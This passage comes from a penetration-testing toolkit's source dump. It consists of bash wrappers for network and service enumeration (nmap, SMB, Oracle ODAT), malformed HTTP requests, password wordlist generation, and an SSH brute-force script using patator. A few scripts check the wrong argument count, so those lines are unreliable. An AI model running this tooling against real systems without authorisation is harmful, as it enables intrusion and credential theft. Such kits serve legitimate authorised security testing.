General Public License as published by 11 | # the Free Software Foundation, either version 3 of the License, or 12 | # (at your option) any later version. 13 | # 14 | # This program is distributed in the hope that it will be useful, 15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of 16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 17 | # GNU General Public License for more details. 18 | # 19 | # You should have received a copy of the GNU General Public License 20 | # along with this program. If not, see . 21 | # 22 | # For more see the file 'LICENSE' for copying permission. 23 | 24 | 25 | if [ $# -eq 1 ]; then 26 | nbtscan -rvh $1 2>&1 | tee "nbtscan_$1.txt" 27 | else 28 | echo "Please provide the target host." 29 | fi 30 | -------------------------------------------------------------------------------- /web/robots-ssl.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # This file is part of PenTestKit 4 | # Copyright (C) 2017-2018 @maldevel 5 | # https://github.com/maldevel/PenTestKit 6 | # 7 | # PenTestKit - Useful tools for Penetration Testing. 8 | # 9 | # This program is free software: you can redistribute it and/or modify 10 | # it under the terms of the GNU General Public License as published by 11 | # the Free Software Foundation, either version 3 of the License, or 12 | # (at your option) any later version. 13 | # 14 | # This program is distributed in the hope that it will be useful, 15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of 16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 17 | # GNU General Public License for more details. 18 | # 19 | # You should have received a copy of the GNU General Public License 20 | # along with this program. If not, see . 21 | # 22 | # For more see the file 'LICENSE' for copying permission. 23 | 24 | 25 | if [ $# -eq 1 ]; then 26 | wget "https://$1/robots.txt" --no-check-certificate 27 | else 28 | echo "Please provide target host." 29 | fi 30 | -------------------------------------------------------------------------------- /web/banner-grabbing-curl-http.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # This file is part of PenTestKit 4 | # Copyright (C) 2017-2020 @maldevel 5 | # https://github.com/maldevel/PenTestKit 6 | # 7 | # PenTestKit - Useful tools for Penetration Testing. 8 | # 9 | # This program is free software: you can redistribute it and/or modify 10 | # it under the terms of the GNU General Public License as published by 11 | # the Free Software Foundation, either version 3 of the License, or 12 | # (at your option) any later version. 13 | # 14 | # This program is distributed in the hope that it will be useful, 15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of 16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 17 | # GNU General Public License for more details. 18 | # 19 | # You should have received a copy of the GNU General Public License 20 | # along with this program. If not, see . 21 | # 22 | # For more see the file 'LICENSE' for copying permission. 23 | 24 | 25 | if [ $# -eq 1 ]; then 26 | curl -s -I -i -X HEAD --insecure "$1" 27 | else 28 | echo "Please provide a target host." 29 | fi 30 | -------------------------------------------------------------------------------- /web/web-headers-null.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # This file is part of PenTestKit 4 | # Copyright (C) 2017-2018 @maldevel 5 | # https://github.com/maldevel/PenTestKit 6 | # 7 | # PenTestKit - Useful tools for Penetration Testing. 8 | # 9 | # This program is free software: you can redistribute it and/or modify 10 | # it under the terms of the GNU General Public License as published by 11 | # the Free Software Foundation, either version 3 of the License, or 12 | # (at your option) any later version. 13 | # 14 | # This program is distributed in the hope that it will be useful, 15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of 16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 17 | # GNU General Public License for more details. 18 | # 19 | # You should have received a copy of the GNU General Public License 20 | # along with this program. If not, see . 21 | # 22 | # For more see the file 'LICENSE' for copying permission. 23 | 24 | 25 | if [ $# -eq 2 ]; then 26 | echo -e 'GET /%00\r\n\r\n' | nc $1 $2 27 | else 28 | echo "Please provide the target IP and port." 29 | fi 30 | -------------------------------------------------------------------------------- /cracking/generate-wordlist.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # This file is part of PenTestKit 4 | # Copyright (C) 2017-2018 @maldevel 5 | # https://github.com/maldevel/PenTestKit 6 | # 7 | # PenTestKit - Useful tools for Penetration Testing. 8 | # 9 | # This program is free software: you can redistribute it and/or modify 10 | # it under the terms of the GNU General Public License as published by 11 | # the Free Software Foundation, either version 3 of the License, or 12 | # (at your option) any later version. 13 | # 14 | # This program is distributed in the hope that it will be useful, 15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of 16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 17 | # GNU General Public License for more details. 18 | # 19 | # You should have received a copy of the GNU General Public License 20 | # along with this program. If not, see . 21 | # 22 | # For more see the file 'LICENSE' for copying permission. 23 | 24 | if [ $# -eq 1 ]; then 25 | cat $1 | rsmangler --file - > $1_passwordlist.txt 26 | else 27 | echo "Please provide a list of words." 28 | fi 29 | -------------------------------------------------------------------------------- /oracle/odat-ping.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # This file is part of PenTestKit 4 | # Copyright (C) 2017-2020 @maldevel 5 | # https://github.com/maldevel/PenTestKit 6 | # 7 | # PenTestKit - Useful tools for Penetration Testing. 8 | # 9 | # This program is free software: you can redistribute it and/or modify 10 | # it under the terms of the GNU General Public License as published by 11 | # the Free Software Foundation, either version 3 of the License, or 12 | # (at your option) any later version. 13 | # 14 | # This program is distributed in the hope that it will be useful, 15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of 16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 17 | # GNU General Public License for more details. 18 | # 19 | # You should have received a copy of the GNU General Public License 20 | # along with this program. If not, see . 21 | # 22 | # For more see the file 'LICENSE' for copying permission. 23 | 24 | 25 | if [ $# -eq 2 ]; then 26 | python3 odat.py tnscmd -s $1 -p $2 --ping 27 | else 28 | echo "Please provide the target host and port." 29 | fi 30 | -------------------------------------------------------------------------------- /oracle/odat-sidguesser.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # This file is part of PenTestKit 4 | # Copyright (C) 2017-2020 @maldevel 5 | # https://github.com/maldevel/PenTestKit 6 | # 7 | # PenTestKit - Useful tools for Penetration Testing. 8 | # 9 | # This program is free software: you can redistribute it and/or modify 10 | # it under the terms of the GNU General Public License as published by 11 | # the Free Software Foundation, either version 3 of the License, or 12 | # (at your option) any later version. 13 | # 14 | # This program is distributed in the hope that it will be useful, 15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of 16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 17 | # GNU General Public License for more details. 18 | # 19 | # You should have received a copy of the GNU General Public License 20 | # along with this program. If not, see . 21 | # 22 | # For more see the file 'LICENSE' for copying permission. 23 | 24 | 25 | if [ $# -eq 2 ]; then 26 | python3 odat.py sidguesser -s $1 -p $2 27 | else 28 | echo "Please provide the target host and port." 29 | fi 30 | -------------------------------------------------------------------------------- /port-scanning/tcp/tcp-ports-scan-delay-nc.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # This file is part of PenTestKit 4 | # Copyright (C) 2017-2020 @maldevel 5 | # https://github.com/maldevel/PenTestKit 6 | # 7 | # PenTestKit - Useful tools for Penetration Testing. 8 | # 9 | # This program is free software: you can redistribute it and/or modify 10 | # it under the terms of the GNU General Public License as published by 11 | # the Free Software Foundation, either version 3 of the License, or 12 | # (at your option) any later version. 13 | # 14 | # This program is distributed in the hope that it will be useful, 15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of 16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 17 | # GNU General Public License for more details. 18 | # 19 | # You should have received a copy of the GNU General Public License 20 | # along with this program. If not, see . 21 | # 22 | # For more see the file 'LICENSE' for copying permission. 23 | 24 | 25 | if [ $# -eq 2 ]; then 26 | nc -w 1 -z -v $1 $2 27 | else 28 | echo "Please provide a host and a port range." 29 | fi 30 | -------------------------------------------------------------------------------- /smb/scan-smbclient.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # This file is part of PenTestKit 4 | # Copyright (C) 2017-2020 @maldevel 5 | # https://github.com/maldevel/PenTestKit 6 | # 7 | # PenTestKit - Useful tools for Penetration Testing. 8 | # 9 | # This program is free software: you can redistribute it and/or modify 10 | # it under the terms of the GNU General Public License as published by 11 | # the Free Software Foundation, either version 3 of the License, or 12 | # (at your option) any later version. 13 | # 14 | # This program is distributed in the hope that it will be useful, 15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of 16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 17 | # GNU General Public License for more details. 18 | # 19 | # You should have received a copy of the GNU General Public License 20 | # along with this program. If not, see . 21 | # 22 | # For more see the file 'LICENSE' for copying permission. 23 | 24 | 25 | if [ $# -eq 1 ]; then 26 | smbclient -L\\ -N -I $1 2>&1 | tee "smbclient_$1.txt" 27 | else 28 | echo "Please provide the target host." 29 | fi 30 | -------------------------------------------------------------------------------- /oracle/odat-status.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # This file is part of PenTestKit 4 | # Copyright (C) 2017-2020 @maldevel 5 | # https://github.com/maldevel/PenTestKit 6 | # 7 | # PenTestKit - Useful tools for Penetration Testing. 8 | # 9 | # This program is free software: you can redistribute it and/or modify 10 | # it under the terms of the GNU General Public License as published by 11 | # the Free Software Foundation, either version 3 of the License, or 12 | # (at your option) any later version. 13 | # 14 | # This program is distributed in the hope that it will be useful, 15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of 16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 17 | # GNU General Public License for more details. 18 | # 19 | # You should have received a copy of the GNU General Public License 20 | # along with this program. If not, see . 21 | # 22 | # For more see the file 'LICENSE' for copying permission. 23 | 24 | 25 | if [ $# -eq 2 ]; then 26 | python3 odat.py tnscmd -s $1 -p $2 --status 27 | else 28 | echo "Please provide the target host and port." 29 | fi 30 | -------------------------------------------------------------------------------- /oracle/odat-version.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # This file is part of PenTestKit 4 | # Copyright (C) 2017-2020 @maldevel 5 | # https://github.com/maldevel/PenTestKit 6 | # 7 | # PenTestKit - Useful tools for Penetration Testing. 8 | # 9 | # This program is free software: you can redistribute it and/or modify 10 | # it under the terms of the GNU General Public License as published by 11 | # the Free Software Foundation, either version 3 of the License, or 12 | # (at your option) any later version. 13 | # 14 | # This program is distributed in the hope that it will be useful, 15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of 16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 17 | # GNU General Public License for more details. 18 | # 19 | # You should have received a copy of the GNU General Public License 20 | # along with this program. If not, see . 21 | # 22 | # For more see the file 'LICENSE' for copying permission. 23 | 24 | 25 | if [ $# -eq 2 ]; then 26 | python3 odat.py tnscmd -s $1 -p $2 --version 27 | else 28 | echo "Please provide the target host and port." 29 | fi 30 | -------------------------------------------------------------------------------- /web/screenshot.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # This file is part of PenTestKit 4 | # Copyright (C) 2017-2018 @maldevel 5 | # https://github.com/maldevel/PenTestKit 6 | # 7 | # PenTestKit - Useful tools for Penetration Testing. 8 | # 9 | # This program is free software: you can redistribute it and/or modify 10 | # it under the terms of the GNU General Public License as published by 11 | # the Free Software Foundation, either version 3 of the License, or 12 | # (at your option) any later version. 13 | # 14 | # This program is distributed in the hope that it will be useful, 15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of 16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 17 | # GNU General Public License for more details. 18 | # 19 | # You should have received a copy of the GNU General Public License 20 | # along with this program. If not, see . 21 | # 22 | # For more see the file 'LICENSE' for copying permission. 23 | 24 | 25 | if [ $# -eq 1 ]; then 26 | python2 /opt/EyeWitness/EyeWitness.py --web -f $1 27 | else 28 | echo "Please provide a file containing target urls." 29 | fi 30 | -------------------------------------------------------------------------------- /web/web-headers-malformed-2.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # This file is part of PenTestKit 4 | # Copyright (C) 2017-2018 @maldevel 5 | # https://github.com/maldevel/PenTestKit 6 | # 7 | # PenTestKit - Useful tools for Penetration Testing. 8 | # 9 | # This program is free software: you can redistribute it and/or modify 10 | # it under the terms of the GNU General Public License as published by 11 | # the Free Software Foundation, either version 3 of the License, or 12 | # (at your option) any later version. 13 | # 14 | # This program is distributed in the hope that it will be useful, 15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of 16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 17 | # GNU General Public License for more details. 18 | # 19 | # You should have received a copy of the GNU General Public License 20 | # along with this program. If not, see . 21 | # 22 | # For more see the file 'LICENSE' for copying permission. 23 | 24 | 25 | if [ $# -eq 2 ]; then 26 | echo -e 'GET / JUNK/1.0\r\n\r\n' | nc $1 $2 27 | else 28 | echo "Please provide the target IP and port." 29 | fi 30 | -------------------------------------------------------------------------------- /web/web-headers-malformed.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # This file is part of PenTestKit 4 | # Copyright (C) 2017-2018 @maldevel 5 | # https://github.com/maldevel/PenTestKit 6 | # 7 | # PenTestKit - Useful tools for Penetration Testing. 8 | # 9 | # This program is free software: you can redistribute it and/or modify 10 | # it under the terms of the GNU General Public License as published by 11 | # the Free Software Foundation, either version 3 of the License, or 12 | # (at your option) any later version. 13 | # 14 | # This program is distributed in the hope that it will be useful, 15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of 16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 17 | # GNU General Public License for more details. 18 | # 19 | # You should have received a copy of the GNU General Public License 20 | # along with this program. If not, see . 21 | # 22 | # For more see the file 'LICENSE' for copying permission. 23 | 24 | 25 | if [ $# -eq 2 ]; then 26 | echo -e 'GET / HTTP/3.0\r\n\r\n' | nc $1 $2 27 | else 28 | echo "Please provide the target IP and port." 29 | fi 30 | -------------------------------------------------------------------------------- /cracking/generate-wordlist-from-site.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # This file is part of PenTestKit 4 | # Copyright (C) 2017-2018 @maldevel 5 | # https://github.com/maldevel/PenTestKit 6 | # 7 | # PenTestKit - Useful tools for Penetration Testing. 8 | # 9 | # This program is free software: you can redistribute it and/or modify 10 | # it under the terms of the GNU General Public License as published by 11 | # the Free Software Foundation, either version 3 of the License, or 12 | # (at your option) any later version. 13 | # 14 | # This program is distributed in the hope that it will be useful, 15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of 16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 17 | # GNU General Public License for more details. 18 | # 19 | # You should have received a copy of the GNU General Public License 20 | # along with this program. If not, see . 21 | # 22 | # For more see the file 'LICENSE' for copying permission. 23 | 24 | if [ $# -eq 2 ]; then 25 | cewl $1 -m $2 -w $1-wordlist.txt 26 | else 27 | echo "Please provide a website and a password length." 28 | fi 29 | -------------------------------------------------------------------------------- /ldap/scan-enum4linux.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # This file is part of PenTestKit 4 | # Copyright (C) 2017-2020 @maldevel 5 | # https://github.com/maldevel/PenTestKit 6 | # 7 | # PenTestKit - Useful tools for Penetration Testing. 8 | # 9 | # This program is free software: you can redistribute it and/or modify 10 | # it under the terms of the GNU General Public License as published by 11 | # the Free Software Foundation, either version 3 of the License, or 12 | # (at your option) any later version. 13 | # 14 | # This program is distributed in the hope that it will be useful, 15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of 16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 17 | # GNU General Public License for more details. 18 | # 19 | # You should have received a copy of the GNU General Public License 20 | # along with this program. If not, see . 21 | # 22 | # For more see the file 'LICENSE' for copying permission. 23 | 24 | 25 | if [ $# -eq 1 ]; then 26 | enum4linux -a -v -M -l -d $1 2>&1 | tee "enum4linux_$1.txt" 27 | else 28 | echo "Please provide the target host." 29 | fi 30 | -------------------------------------------------------------------------------- /smb/scan-enum4linux.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # This file is part of PenTestKit 4 | # Copyright (C) 2017-2020 @maldevel 5 | # https://github.com/maldevel/PenTestKit 6 | # 7 | # PenTestKit - Useful tools for Penetration Testing. 8 | # 9 | # This program is free software: you can redistribute it and/or modify 10 | # it under the terms of the GNU General Public License as published by 11 | # the Free Software Foundation, either version 3 of the License, or 12 | # (at your option) any later version. 13 | # 14 | # This program is distributed in the hope that it will be useful, 15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of 16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 17 | # GNU General Public License for more details. 18 | # 19 | # You should have received a copy of the GNU General Public License 20 | # along with this program. If not, see . 21 | # 22 | # For more see the file 'LICENSE' for copying permission. 23 | 24 | 25 | if [ $# -eq 1 ]; then 26 | enum4linux -a -v -M -l -d $1 2>&1 | tee "enum4linux_$1.txt" 27 | else 28 | echo "Please provide the target host." 29 | fi 30 | -------------------------------------------------------------------------------- /web/banner-grabbing-nc-http.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # This file is part of PenTestKit 4 | # Copyright (C) 2017-2020 @maldevel 5 | # https://github.com/maldevel/PenTestKit 6 | # 7 | # PenTestKit - Useful tools for Penetration Testing. 8 | # 9 | # This program is free software: you can redistribute it and/or modify 10 | # it under the terms of the GNU General Public License as published by 11 | # the Free Software Foundation, either version 3 of the License, or 12 | # (at your option) any later version. 13 | # 14 | # This program is distributed in the hope that it will be useful, 15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of 16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 17 | # GNU General Public License for more details. 18 | # 19 | # You should have received a copy of the GNU General Public License 20 | # along with this program. If not, see . 21 | # 22 | # For more see the file 'LICENSE' for copying permission. 23 | 24 | 25 | if [ $# -eq 2 ]; then 26 | echo -e 'HEAD / HTTP/1.0\r\n\r\n' | nc $1 $2 27 | else 28 | echo "Please provide the target host and port." 29 | fi 30 | -------------------------------------------------------------------------------- /oracle/scanner.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # This file is part of PenTestKit 4 | # Copyright (C) 2017-2020 @maldevel 5 | # https://github.com/maldevel/PenTestKit 6 | # 7 | # PenTestKit - Useful tools for Penetration Testing. 8 | # 9 | # This program is free software: you can redistribute it and/or modify 10 | # it under the terms of the GNU General Public License as published by 11 | # the Free Software Foundation, either version 3 of the License, or 12 | # (at your option) any later version. 13 | # 14 | # This program is distributed in the hope that it will be useful, 15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of 16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 17 | # GNU General Public License for more details. 18 | # 19 | # You should have received a copy of the GNU General Public License 20 | # along with this program. If not, see . 21 | # 22 | # For more see the file 'LICENSE' for copying permission. 23 | 24 | 25 | if [ $# -eq 2 ]; then 26 | oscanner -v -s $1 -P $2 2>&1 | tee "oracle_scanner_$1_$2.txt" 27 | else 28 | echo "Please provide the target host and port." 29 | fi 30 | -------------------------------------------------------------------------------- /reconnaissance/shodan/shodanhat/LICENSE: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2017 HatBashBR 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | -------------------------------------------------------------------------------- /web/banner-grabbing-nmap-script.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # This file is part of PenTestKit 4 | # Copyright (C) 2017-2020 @maldevel 5 | # https://github.com/maldevel/PenTestKit 6 | # 7 | # PenTestKit - Useful tools for Penetration Testing. 8 | # 9 | # This program is free software: you can redistribute it and/or modify 10 | # it under the terms of the GNU General Public License as published by 11 | # the Free Software Foundation, either version 3 of the License, or 12 | # (at your option) any later version. 13 | # 14 | # This program is distributed in the hope that it will be useful, 15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of 16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 17 | # GNU General Public License for more details. 18 | # 19 | # You should have received a copy of the GNU General Public License 20 | # along with this program. If not, see . 21 | # 22 | # For more see the file 'LICENSE' for copying permission. 23 | 24 | 25 | if [ $# -eq 2 ]; then 26 | nmap -sV --script=banner "$1" -p"$2" 27 | else 28 | echo "Please provide a target host and a list of ports." 29 | fi 30 | -------------------------------------------------------------------------------- /web/curl-options.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # This file is part of PenTestKit 4 | # Copyright (C) 2017-2018 @maldevel 5 | # https://github.com/maldevel/PenTestKit 6 | # 7 | # PenTestKit - Useful tools for Penetration Testing. 8 | # 9 | # This program is free software: you can redistribute it and/or modify 10 | # it under the terms of the GNU General Public License as published by 11 | # the Free Software Foundation, either version 3 of the License, or 12 | # (at your option) any later version. 13 | # 14 | # This program is distributed in the hope that it will be useful, 15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of 16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 17 | # GNU General Public License for more details. 18 | # 19 | # You should have received a copy of the GNU General Public License 20 | # along with this program. If not, see . 21 | # 22 | # For more see the file 'LICENSE' for copying permission. 23 | 24 | 25 | # e.g. $1 == target url 26 | 27 | if [ $# -eq 1 ]; then 28 | curl -i -I -X OPTIONS --insecure "$1" 29 | else 30 | echo "Please provide a target host." 31 | fi 32 | -------------------------------------------------------------------------------- /cracking/ssh-bf.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # This file is part of PenTestKit 4 | # Copyright (C) 2017-2018 @maldevel 5 | # https://github.com/maldevel/PenTestKit 6 | # 7 | # PenTestKit - Useful tools for Penetration Testing. 8 | # 9 | # This program is free software: you can redistribute it and/or modify 10 | # it under the terms of the GNU General Public License as published by 11 | # the Free Software Foundation, either version 3 of the License, or 12 | # (at your option) any later version. 13 | # 14 | # This program is distributed in the hope that it will be useful, 15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of 16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 17 | # GNU General Public License for more details. 18 | # 19 | # You should have received a copy of the GNU General Public License 20 | # along with this program. If not, see . 21 | # 22 | # For more see the file 'LICENSE' for copying permission. 23 | 24 | if [ $# -eq 3 ]; then 25 | patator ssh_login host=$1 user=$2 password=FILE0 0=$3 26 | else 27 | echo "Please provide a target host, a username and a password list." 28 | fi 29 | -------------------------------------------------------------------------------- /grep/grep-unique-live-hosts.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # This file is part of PenTestKit 4 | # Copyright (C) 2017-2020 @maldevel 5 | # https://github.com/maldevel/PenTestKit 6 | # 7 | # PenTestKit - Useful tools for Penetration Testing. 8 | # 9 | # This program is free software: you can redistribute it and/or modify 10 | # it under the terms of the GNU General Public License as published by 11 | # the Free Software Foundation, either version 3 of the License, or 12 | # (at your option) any later version. 13 | # 14 | # This program is distributed in the hope that it will be useful, 15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of 16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 17 | # GNU General Public License for more details. 18 | # 19 | # You should have received a copy of the GNU General Public License 20 | # along with this program. If not, see . 21 | # 22 | # For more see the file 'LICENSE' for copying permission. 23 | 24 | if [ $# -eq 1 ]; then 25 | cat $1/*.gnmap | grep 'Status: Up' | cut -d ' ' -f2 | sort -V | uniq 26 | else 27 | echo "Please provide a directory path." 28 | fi 29 | -------------------------------------------------------------------------------- /oracle/odat-tnspoison.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # This file is part of PenTestKit 4 | # Copyright (C) 2017-2020 @maldevel 5 | # https://github.com/maldevel/PenTestKit 6 | # 7 | # PenTestKit - Useful tools for Penetration Testing. 8 | # 9 | # This program is free software: you can redistribute it and/or modify 10 | # it under the terms of the GNU General Public License as published by 11 | # the Free Software Foundation, either version 3 of the License, or 12 | # (at your option) any later version. 13 | # 14 | # This program is distributed in the hope that it will be useful, 15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of 16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 17 | # GNU General Public License for more details. 18 | # 19 | # You should have received a copy of the GNU General Public License 20 | # along with this program. If not, see . 21 | # 22 | # For more see the file 'LICENSE' for copying permission. 23 | 24 | 25 | if [ $# -eq 2 ]; then 26 | python3 odat.py tnspoison -s $1 -p $2 -d $3 --test-module 27 | else 28 | echo "Please provide the target host and port." 29 | fi 30 | -------------------------------------------------------------------------------- /web/banner-grabbing-curl-http-proxy.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # This file is part of PenTestKit 4 | # Copyright (C) 2017-2020 @maldevel 5 | # https://github.com/maldevel/PenTestKit 6 | # 7 | # PenTestKit - Useful tools for Penetration Testing. 8 | # 9 | # This program is free software: you can redistribute it and/or modify 10 | # it under the terms of the GNU General Public License as published by 11 | # the Free Software Foundation, either version 3 of the License, or 12 | # (at your option) any later version. 13 | # 14 | # This program is distributed in the hope that it will be useful, 15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of 16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 17 | # GNU General Public License for more details. 18 | # 19 | # You should have received a copy of the GNU General Public License 20 | # along with this program. If not, see . 21 | # 22 | # For more see the file 'LICENSE' for copying permission. 23 | 24 | 25 | if [ $# -eq 1 ]; then 26 | curl -I -i -X HEAD -x "$1" --insecure "$2" 27 | else 28 | echo "Please provide a proxy server and a target host." 29 | fi 30 | -------------------------------------------------------------------------------- /web/banner-grabbing-nmap-built-in.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # This file is part of PenTestKit 4 | # Copyright (C) 2017-2020 @maldevel 5 | # https://github.com/maldevel/PenTestKit 6 | # 7 | # PenTestKit - Useful tools for Penetration Testing. 8 | # 9 | # This program is free software: you can redistribute it and/or modify 10 | # it under the terms of the GNU General Public License as published by 11 | # the Free Software Foundation, either version 3 of the License, or 12 | # (at your option) any later version. 13 | # 14 | # This program is distributed in the hope that it will be useful, 15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of 16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 17 | # GNU General Public License for more details. 18 | # 19 | # You should have received a copy of the GNU General Public License 20 | # along with this program. If not, see . 21 | # 22 | # For more see the file 'LICENSE' for copying permission. 23 | 24 | 25 | if [ $# -eq 2 ]; then 26 | nmap -sV --version-intensity 5 "$1" -p"$2" 27 | else 28 | echo "Please provide a target host and a list of ports." 29 | fi 30 | -------------------------------------------------------------------------------- /oracle/oracle-tnscmd-ping.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # This file is part of PenTestKit 4 | # Copyright (C) 2017-2020 @maldevel 5 | # https://github.com/maldevel/PenTestKit 6 | # 7 | # PenTestKit - Useful tools for Penetration Testing. 8 | # 9 | # This program is free software: you can redistribute it and/or modify 10 | # it under the terms of the GNU General Public License as published by 11 | # the Free Software Foundation, either version 3 of the License, or 12 | # (at your option) any later version. 13 | # 14 | # This program is distributed in the hope that it will be useful, 15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of 16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 17 | # GNU General Public License for more details. 18 | # 19 | # You should have received a copy of the GNU General Public License 20 | # along with this program. If not, see . 21 | # 22 | # For more see the file 'LICENSE' for copying permission. 23 | 24 | 25 | if [ $# -eq 2 ]; then 26 | tnscmd10g ping -h $1 -p $2 2>&1 | tee "oracle_tnscmd_ping_$1_$2.txt" 27 | else 28 | echo "Please provide the target host and port." 29 | fi 30 | -------------------------------------------------------------------------------- /web/nuclei-scan.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # This file is part of PenTestKit 4 | # Copyright (C) 2017-2025 @maldevel 5 | # https://github.com/maldevel/PenTestKit 6 | # 7 | # PenTestKit - Useful tools for Penetration Testing. 8 | # 9 | # This program is free software: you can redistribute it and/or modify 10 | # it under the terms of the GNU General Public License as published by 11 | # the Free Software Foundation, either version 3 of the License, or 12 | # (at your option) any later version. 13 | # 14 | # This program is distributed in the hope that it will be useful, 15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of 16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 17 | # GNU General Public License for more details. 18 | # 19 | # You should have received a copy of the GNU General Public License 20 | # along with this program. If not, see . 21 | # 22 | # For more see the file 'LICENSE' for copying permission. 23 | 24 | 25 | if [ $# -eq 3 